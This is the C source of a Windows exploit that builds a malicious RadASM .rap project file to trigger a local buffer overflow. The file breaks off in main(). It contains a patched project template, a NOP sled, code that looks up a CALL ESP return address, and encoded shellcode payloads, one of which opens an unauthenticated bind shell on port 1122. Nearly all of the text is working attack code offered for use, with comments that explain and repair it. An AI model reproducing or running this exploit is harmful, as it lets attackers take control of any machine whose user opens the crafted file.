
# Title : Radasm .rap file local buffer overflow vulnerability
# Published : 2010-02-11
# Author : fl0 fl0w


#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <getopt.h>
/* Forward declarations.  Parameter names are given so the contract is readable
 * without scrolling to the definitions. */
void         gen_random(char *s, const int len);   /* random alnum fill, NUL at s[len] */
void         print(char *msg);                      /* "[*]msg" + newline to stdout */
unsigned int getFsize(FILE *g, char *gname);        /* size of the file named gname */
void         buildfile(char *fname);                /* write the malicious .rap to fname */
int          make_bindshell(unsigned short port);   /* declared only; no definition in the part of the file shown */
void         help(void);
void         printshell(void);
DWORD        SearchStream(const char *pvStream, size_t uStreamSize,
                          const char *pvSubStream, size_t uSubStreamSize);
DWORD        GetNtosDelta(VOID);
DWORD        GetOSVersion(VOID);
DWORD        FindRetToEspAddress(VOID);
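/* Output file name, banner strings. VER is presumably the RadASM release the
 * author tested against (it is only printed, never checked). */
#define VULNF           "ufwew.rap"
#define VER             "2.2.1.6"
#define POCNAME         "Radasm .rap file local buffer overflow exploit"
#define AUTHOR          "fl0 fl0w"
/* Helper macros.  The original IF() named its second parameter NULL, which
 * shadowed the real NULL inside the expansion; both macros now parenthesise
 * their arguments. */
#define IF(x,y)         if((x)==(y))
#define FOR(i,a,b)      for((i)=(a);(i)<(b);++(i))
/* Offset of the saved return address inside the overlong filename; not
 * referenced by the code below (buildfile() uses absolute file offsets). */
#define EIPOFFSET       0xDD
/* 10-byte NOP sled.  The page had lost the backslashes ("x90") and the line
 * continuation, which would have made this 15 ASCII characters followed by a
 * stray string literal; restored as real 0x90 bytes. */
#define NOP             "\x90\x90\x90\x90\x90" \
                        "\x90\x90\x90\x90\x90"
/* NUL byte; used as the sentinel row of the payload table. */
#define NUL             '\0'
#define CLEAR(x)        free(x)
/* Per-OS adjustments reported by GetNtosDelta(); only XP has a non-zero value.
 * No trailing semicolons: the originals expanded to "retval=0xA67FF;;". */
#define WXP_DELTA       0xA67FF
#define W2K_DELTA       0x0
#define W2K3_DELTA      0x0
#define WVISTA_DELTA    0x0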
    /*
     * 1534-byte .rap project template that buildfile() patches and writes out.
     * It is an INI-like text: "[Project]\r\r\nAssembler=masm\r\r\nGroup=1\r\r\n
     * GroupExpand=1\r\r\n[Files]\r\r\n1=AVP Overfr<~1000 random chars>.Asm\r\r\n
     * 2=AVP Over.Inc ..." followed by [MakeFiles], [MakeDef] and [Group]
     * sections.  The overlong "1=" filename under [Files] is the field the
     * advisory title attributes the overflow to.
     *
     * buildfile() overwrites, by absolute offset into this array:
     *   292..295  the return address (ret)
     *   312..321  the NOP sled
     *   322..     the selected payload (use[S].shell)
     * The "BBBB""AAAA" bytes at offsets 308..315 look like leftover markers
     * from the author's offset hunting; the NOPs land on the "AAAA".
     *
     * NOTE: there is no terminating 0x00 in this initializer, so strlen(file)
     * reads past the end of the array; use sizeof(file) for its length.
     */
    char file[]={ //1534 bytes
    0x5B, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x5D, 0x0D, 0x0D, 0x0A, 0x41, 0x73, 0x73, 0x65, 
    0x6D, 0x62, 0x6C, 0x65, 0x72, 0x3D, 0x6D, 0x61, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 
    0x75, 0x70, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x45, 0x78, 0x70, 0x61, 
    0x6E, 0x64, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x5B, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D, 
    0x0A, 0x31, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x72, 0x41, 0x51, 0x42, 
    0x63, 0x38, 0x57, 0x73, 0x61, 0x31, 0x78, 0x56, 0x50, 0x66, 0x76, 0x4A, 0x63, 0x72, 0x67, 0x52, 
    0x59, 0x77, 0x54, 0x69, 0x69, 0x7A, 0x73, 0x32, 0x74, 0x72, 0x51, 0x46, 0x36, 0x39, 0x41, 0x7A, 
    0x42, 0x6C, 0x61, 0x78, 0x33, 0x43, 0x46, 0x33, 0x45, 0x44, 0x4E, 0x68, 0x6D, 0x33, 0x73, 0x6F, 
    0x4C, 0x42, 0x50, 0x68, 0x37, 0x31, 0x59, 0x65, 0x78, 0x75, 0x69, 0x65, 0x61, 0x6F, 0x45, 0x69, 
    0x49, 0x67, 0x78, 0x49, 0x58, 0x34, 0x61, 0x32, 0x64, 0x52, 0x45, 0x62, 0x62, 0x53, 0x71, 0x57, 
    0x79, 0x36, 0x79, 0x68, 0x4B, 0x49, 0x44, 0x43, 0x64, 0x4A, 0x4F, 0x79, 0x61, 0x70, 0x6E, 0x78, 
    0x72, 0x70, 0x4D, 0x43, 0x41, 0x52, 0x43, 0x72, 0x34, 0x7A, 0x64, 0x47, 0x63, 0x38, 0x31, 0x74, 
    0x42, 0x44, 0x4B, 0x73, 0x4D, 0x6C, 0x61, 0x5A, 0x54, 0x58, 0x43, 0x31, 0x4F, 0x38, 0x59, 0x46, 
    0x4F, 0x47, 0x4B, 0x6A, 0x78, 0x52, 0x72, 0x4A, 0x42, 0x64, 0x54, 0x33, 0x68, 0x56, 0x4F, 0x66, 
    0x6F, 0x61, 0x4D, 0x65, 0x41, 0x6A, 0x53, 0x57, 0x66, 0x63, 0x68, 0x6F, 0x5A, 0x59, 0x46, 0x59, 
    0x5A, 0x35, 0x42, 0x36, 0x6B, 0x7A, 0x4D, 0x43, 0x6B, 0x38, 0x52, 0x36, 0x42, 0x45, 0x75, 0x5A, 
    0x4D, 0x72, 0x46, 0x36, 0x63, 0x49, 0x36, 0x4E, 0x58, 0x38, 0x44, 0x59, 0x64, 0x44, 0x33, 0x6F, 
    0x6A, 0x78, 0x53, 0x6E, 0x71, 0x50, 0x54, 0x47, 0x66, 0x52, 0x79, 0x69, 0x6C, 0x4F, 0x59, 0x47, 
    0x78, 0x6C, 0x53, 0x58, 0x50, 0x74, 0x4C, 0x4A, 0x62, 0x6F, 0x48, 0x38, 0x53, 0x34, 0x6B, 0x77, 
    0x49, 0x67, 0x54, 0x78, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41, 0x41, 0x41, 0x7A, 0x4F, 0x4C, 0x4D, 
    0x72, 0x62, 0x41, 0x79, 0x66, 0x4B, 0x55, 0x55, 0x54, 0x73, 0x47, 0x43, 0x6F, 0x52, 0x62, 0x6C, 
    0x73, 0x61, 0x71, 0x76, 0x36, 0x55, 0x70, 0x64, 0x76, 0x4E, 0x49, 0x73, 0x4E, 0x72, 0x6D, 0x77, 
    0x55, 0x6C, 0x4E, 0x35, 0x75, 0x39, 0x74, 0x33, 0x74, 0x67, 0x6A, 0x32, 0x74, 0x75, 0x73, 0x5A, 
    0x42, 0x61, 0x75, 0x46, 0x6B, 0x72, 0x46, 0x43, 0x4A, 0x43, 0x6D, 0x5A, 0x46, 0x4F, 0x76, 0x31, 
    0x51, 0x44, 0x49, 0x49, 0x58, 0x4A, 0x4E, 0x5A, 0x49, 0x39, 0x35, 0x68, 0x46, 0x51, 0x72, 0x37, 
    0x37, 0x42, 0x49, 0x45, 0x6C, 0x79, 0x63, 0x74, 0x34, 0x41, 0x6A, 0x36, 0x50, 0x4B, 0x6E, 0x5A, 
    0x70, 0x7A, 0x52, 0x69, 0x4B, 0x59, 0x70, 0x5A, 0x67, 0x6E, 0x53, 0x4F, 0x4B, 0x6C, 0x71, 0x38, 
    0x41, 0x7A, 0x72, 0x48, 0x71, 0x44, 0x6F, 0x47, 0x4C, 0x34, 0x52, 0x48, 0x79, 0x71, 0x79, 0x58, 
    0x33, 0x67, 0x35, 0x41, 0x79, 0x79, 0x36, 0x31, 0x6C, 0x65, 0x44, 0x59, 0x54, 0x33, 0x43, 0x45, 
    0x57, 0x38, 0x4B, 0x36, 0x39, 0x72, 0x6B, 0x6C, 0x50, 0x47, 0x74, 0x66, 0x55, 0x52, 0x32, 0x49, 
    0x5A, 0x32, 0x6D, 0x42, 0x31, 0x53, 0x37, 0x4E, 0x4C, 0x74, 0x32, 0x6E, 0x51, 0x66, 0x6A, 0x33, 
    0x53, 0x4C, 0x33, 0x58, 0x42, 0x79, 0x49, 0x6D, 0x63, 0x69, 0x51, 0x54, 0x71, 0x56, 0x61, 0x41, 
    0x55, 0x6E, 0x4A, 0x76, 0x55, 0x6D, 0x48, 0x56, 0x51, 0x47, 0x73, 0x54, 0x6D, 0x76, 0x48, 0x65, 
    0x75, 0x53, 0x45, 0x42, 0x4D, 0x53, 0x50, 0x68, 0x32, 0x51, 0x36, 0x64, 0x51, 0x41, 0x6A, 0x79, 
    0x34, 0x4B, 0x6A, 0x73, 0x66, 0x53, 0x58, 0x46, 0x34, 0x59, 0x50, 0x38, 0x61, 0x72, 0x46, 0x33, 
    0x53, 0x4C, 0x4C, 0x6E, 0x79, 0x33, 0x30, 0x4B, 0x4B, 0x7A, 0x69, 0x48, 0x74, 0x52, 0x62, 0x4F, 
    0x45, 0x32, 0x75, 0x38, 0x71, 0x76, 0x4A, 0x50, 0x33, 0x42, 0x36, 0x55, 0x69, 0x75, 0x31, 0x67, 
    0x4A, 0x30, 0x33, 0x4F, 0x68, 0x6D, 0x57, 0x76, 0x6E, 0x37, 0x4D, 0x49, 0x72, 0x39, 0x6F, 0x44, 
    0x55, 0x54, 0x4F, 0x58, 0x37, 0x4E, 0x59, 0x45, 0x6B, 0x5A, 0x67, 0x7A, 0x55, 0x6E, 0x79, 0x31, 
    0x73, 0x77, 0x4F, 0x62, 0x64, 0x59, 0x53, 0x45, 0x76, 0x57, 0x52, 0x42, 0x4C, 0x7A, 0x5A, 0x30, 
    0x32, 0x68, 0x36, 0x37, 0x59, 0x72, 0x6C, 0x76, 0x42, 0x6E, 0x64, 0x6E, 0x34, 0x63, 0x58, 0x50, 
    0x61, 0x6F, 0x61, 0x4B, 0x6B, 0x35, 0x6C, 0x51, 0x6E, 0x33, 0x33, 0x68, 0x66, 0x4E, 0x57, 0x50, 
    0x67, 0x72, 0x38, 0x38, 0x31, 0x6E, 0x50, 0x37, 0x56, 0x78, 0x45, 0x45, 0x34, 0x46, 0x64, 0x67, 
    0x63, 0x4C, 0x39, 0x66, 0x4F, 0x50, 0x79, 0x63, 0x39, 0x38, 0x62, 0x49, 0x38, 0x39, 0x71, 0x54, 
    0x50, 0x46, 0x74, 0x79, 0x73, 0x4C, 0x31, 0x51, 0x34, 0x47, 0x54, 0x4F, 0x50, 0x77, 0x44, 0x37, 
    0x6B, 0x6B, 0x71, 0x50, 0x71, 0x51, 0x35, 0x50, 0x4E, 0x45, 0x45, 0x66, 0x75, 0x54, 0x6C, 0x43, 
    0x48, 0x39, 0x57, 0x70, 0x49, 0x59, 0x61, 0x50, 0x48, 0x57, 0x66, 0x55, 0x54, 0x6A, 0x6C, 0x54, 
    0x4F, 0x53, 0x6A, 0x33, 0x69, 0x48, 0x37, 0x4A, 0x54, 0x52, 0x73, 0x62, 0x59, 0x48, 0x31, 0x33, 
    0x33, 0x54, 0x79, 0x57, 0x4C, 0x49, 0x42, 0x34, 0x47, 0x33, 0x73, 0x56, 0x30, 0x79, 0x6B, 0x50, 
    0x64, 0x73, 0x37, 0x48, 0x58, 0x32, 0x37, 0x4B, 0x62, 0x4E, 0x43, 0x43, 0x79, 0x74, 0x4A, 0x52, 
    0x38, 0x43, 0x75, 0x36, 0x58, 0x46, 0x70, 0x74, 0x45, 0x49, 0x50, 0x36, 0x38, 0x76, 0x38, 0x5A, 
    0x64, 0x56, 0x36, 0x30, 0x47, 0x58, 0x41, 0x50, 0x5A, 0x48, 0x41, 0x44, 0x32, 0x76, 0x51, 0x6B, 
    0x57, 0x72, 0x70, 0x71, 0x69, 0x77, 0x64, 0x6F, 0x33, 0x48, 0x72, 0x64, 0x74, 0x36, 0x7A, 0x33, 
    0x6C, 0x53, 0x54, 0x70, 0x67, 0x54, 0x70, 0x52, 0x70, 0x52, 0x56, 0x63, 0x77, 0x6F, 0x36, 0x48, 
    0x4D, 0x38, 0x75, 0x41, 0x38, 0x44, 0x39, 0x65, 0x45, 0x34, 0x5A, 0x41, 0x44, 0x74, 0x6D, 0x76, 
    0x57, 0x76, 0x4E, 0x32, 0x30, 0x4C, 0x42, 0x48, 0x53, 0x6B, 0x44, 0x36, 0x71, 0x72, 0x37, 0x4A, 
    0x31, 0x68, 0x41, 0x6B, 0x54, 0x6B, 0x55, 0x46, 0x76, 0x4D, 0x41, 0x30, 0x4F, 0x53, 0x61, 0x39, 
    0x31, 0x65, 0x39, 0x67, 0x71, 0x56, 0x4E, 0x42, 0x65, 0x67, 0x31, 0x30, 0x67, 0x41, 0x49, 0x34, 
    0x4F, 0x4D, 0x72, 0x78, 0x46, 0x32, 0x6C, 0x74, 0x52, 0x50, 0x57, 0x61, 0x63, 0x4B, 0x77, 0x68, 
    0x7A, 0x51, 0x79, 0x77, 0x38, 0x62, 0x79, 0x78, 0x49, 0x46, 0x77, 0x4F, 0x51, 0x66, 0x78, 0x46, 
    0x59, 0x79, 0x30, 0x71, 0x75, 0x75, 0x62, 0x70, 0x43, 0x7A, 0x49, 0x37, 0x31, 0x4D, 0x52, 0x56, 
    0x4F, 0x67, 0x44, 0x6B, 0x6F, 0x38, 0x66, 0x6E, 0x50, 0x59, 0x6C, 0x61, 0x70, 0x64, 0x76, 0x78, 
    0x6C, 0x55, 0x73, 0x42, 0x48, 0x32, 0x39, 0x43, 0x6D, 0x33, 0x4F, 0x52, 0x59, 0x6B, 0x66, 0x72, 
    0x6A, 0x52, 0x5A, 0x44, 0x64, 0x77, 0x36, 0x4C, 0x63, 0x70, 0x58, 0x33, 0x33, 0x65, 0x31, 0x49, 
    0x4F, 0x77, 0x57, 0x52, 0x32, 0x75, 0x61, 0x41, 0x74, 0x5A, 0x56, 0x42, 0x35, 0x79, 0x69, 0x39, 
    0x69, 0x6A, 0x53, 0x41, 0x6A, 0x42, 0x51, 0x6A, 0x67, 0x6E, 0x5A, 0x53, 0x43, 0x65, 0x38, 0x6E, 
    0x50, 0x51, 0x48, 0x6E, 0x70, 0x70, 0x5A, 0x71, 0x74, 0x34, 0x35, 0x36, 0x75, 0x4E, 0x68, 0x61, 
    0x41, 0x41, 0x5A, 0x2E, 0x41, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x41, 0x56, 0x50, 0x20, 
    0x4F, 0x76, 0x65, 0x72, 0x2E, 0x49, 0x6E, 0x63, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65, 
    0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D, 0x0A, 0x30, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F, 
    0x76, 0x65, 0x72, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65, 0x44, 
    0x65, 0x66, 0x5D, 0x0D, 0x0D, 0x0A, 0x4D, 0x65, 0x6E, 0x75, 0x3D, 0x30, 0x2C, 0x31, 0x2C, 0x31, 
    0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 
    0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x0D, 0x0D, 0x0A, 0x31, 0x3D, 0x34, 
    0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x52, 0x43, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x76, 0x2C, 
    0x31, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x33, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E, 
    0x45, 0x58, 0x45, 0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70, 
    0x20, 0x2F, 0x6E, 0x6F, 0x36, 0x43, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22, 
    0x2C, 0x32, 0x0D, 0x0D, 0x0A, 0x33, 0x3D, 0x35, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4C, 0x49, 
    0x4E, 0x4B, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x53, 0x55, 0x42, 0x53, 0x59, 0x53, 0x54, 0x45, 
    0x4D, 0x3A, 0x57, 0x49, 0x4E, 0x44, 0x4F, 0x57, 0x53, 0x20, 0x2F, 0x52, 0x45, 0x4C, 0x45, 0x41, 
    0x53, 0x45, 0x20, 0x2F, 0x56, 0x45, 0x52, 0x53, 0x49, 0x4F, 0x4E, 0x3A, 0x34, 0x2E, 0x30, 0x20, 
    0x2F, 0x4C, 0x49, 0x42, 0x50, 0x41, 0x54, 0x48, 0x3A, 0x22, 0x24, 0x4C, 0x22, 0x20, 0x2F, 0x4F, 
    0x55, 0x54, 0x3A, 0x22, 0x24, 0x35, 0x22, 0x2C, 0x33, 0x0D, 0x0D, 0x0A, 0x34, 0x3D, 0x30, 0x2C, 
    0x30, 0x2C, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x35, 0x3D, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x6F, 0x62, 
    0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x43, 0x56, 0x54, 0x52, 0x45, 0x53, 0x2E, 0x45, 0x58, 
    0x45, 0x2C, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x36, 0x3D, 0x2A, 
    0x2E, 0x6F, 0x62, 0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E, 0x45, 0x58, 0x45, 
    0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70, 0x20, 0x2F, 0x6E, 
    0x6F, 0x6C, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22, 0x2C, 0x2A, 0x2E, 0x61, 
    0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x37, 0x3D, 0x30, 0x2C, 0x30, 0x2C, 0x22, 0x24, 0x45, 0x5C, 0x4F, 
    0x6C, 0x6C, 0x79, 0x44, 0x62, 0x67, 0x22, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x5B, 0x47, 0x72, 0x6F, 
    0x75, 0x70, 0x5D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x3D, 0x41, 0x64, 0x64, 0x65, 
    0x64, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x73, 0x2C, 0x41, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79, 
    0x2C, 0x52, 0x65, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x73, 0x2C, 0x4D, 0x69, 0x73, 0x63, 0x2C, 
    0x4D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x73, 0x0D, 0x0A, 0x31, 0x3D, 0x31, 0x0D, 0x0A,};
    /* Last value returned by GetOSVersion(): an OSes enum value, 0 if unrecognised. */
    DWORD  g_dwOsVersion  = 0;
    /* Declared but never referenced in this file. */
    LPVOID g_PatchAddress = NULL;
    /* Function-pointer typedefs; none of them is used anywhere in this file. */
    typedef BOOL  (WINAPI *PENUMDEVICES)(LPVOID *, DWORD, LPDWORD);
    typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, char *lpBaseName, DWORD nSize);
    typedef DWORD (WINAPI *PQUERYSYSTEM)(UINT, PVOID, DWORD, PDWORD);
    /* Host OS classification produced by GetOSVersion(); 0 means "unknown". */
    enum OSes {
        OS_WXP   = 1,   /* 5.1 */
        OS_W2K   = 2,   /* 5.0 */
        OS_W2K3  = 3,   /* 5.2 */
        OS_VISTA = 4    /* any 6.x */
    };
   /* Tri-state boolean; not used by any function in this file. */
   typedef enum {
       Error = -1,
       False = 0,
       True  = 1
   } boolean;
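   /*
    * Payload table, indexed by the -s option.
    *
    * Each row is a NUL-free payload: the ten leading bytes
    * \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff are a GetPC stub (jmp/pop ecx/
    * jmp/call -8); what follows is presumably an alphanumeric-encoded body
    * that decodes itself in place.  `sz` is the byte length and equals
    * strlen(shell) for both rows.
    *
    * The page had lost the backslash of every \xNN escape, which would have
    * turned the payloads into the literal ASCII text "xeb\x03..."; the escapes
    * are restored here.
    *
    * Row 1, per its name, opens a bind shell on TCP port 1122 on the victim.
    * Such a listener is unauthenticated: anyone able to reach that port gets
    * the shell, not only the person who planted the file.
    *
    * The last row is a NULL sentinel so callers can walk the table without a
    * hard-coded count.
    */
   struct {
       char *sname;   /* display name */
       int   sz;      /* byte length of shell */
       char *shell;   /* payload bytes, NUL-terminated */
   } use[] = {
       { "calc.exe", 338,
         "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
         "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
         "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
         "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
         "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
         "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
         "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
         "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
         "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
         "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
         "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
         "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
         "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
         "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
         "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
         "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
         "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
         "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
         "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
         "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
         "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63"
       },
       { "Bind port 1122", 709,
         "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
         "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
         "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
         "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
         "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
         "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
         "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
         "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
         "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
         "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
         "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
         "\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
         "\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
         "\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
         "\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
         "\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
         "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
         "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
         "\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
         "\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
         "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
         "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
         "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
         "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
         "\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
         "\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
         "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
         "\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
         "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
         "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
         "\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
         "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
         "\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
         "\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
         "\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
         "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
         "\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
         "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
         "\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
         "\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
         "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
         "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
         "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
         "\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
         "\x4f\x4f\x42\x4d\x5a"
       },
       { NULL, 0, NULL }   /* sentinel */
   };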
  /* Not referenced anywhere in this file. */
  struct {
      unsigned int code;
  } usez;
  /* Return address that buildfile() writes at offset 292 of the .rap;
   * set by main() from FindRetToEspAddress() or the -t option. */
  DWORD ret = 0;
  /* Index into use[] chosen with -s; read by buildfile() and main(). */
  int S = 0;
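  /*
   * Entry point.
   *   no arguments      : print usage, host OS, payload list, default retcode
   *   -s <0|1>          : payload index into use[]
   *   -t <hex address>  : return address (default: CALL ESP found in THIS
   *                       process' kernel32 -- only meaningful if the target
   *                       runs the very same kernel32 at the same base)
   * Fixes against the original: "-t" now takes an argument through getopt
   * (the original optstring "s:t" had no ':' after t and then read argv[4]
   * unconditionally, a NULL dereference for short command lines); -s is
   * range-checked before use[S] is indexed; system("cls") is gone.
   */
  int main(int argc, char *argv[]) {
      /* usable rows in use[]; the table ends with a NULL sentinel row */
      const int nshells = (int)(sizeof(use) / sizeof(use[0])) - 1;
      int opt;

      ret = FindRetToEspAddress();   /* default EIP */
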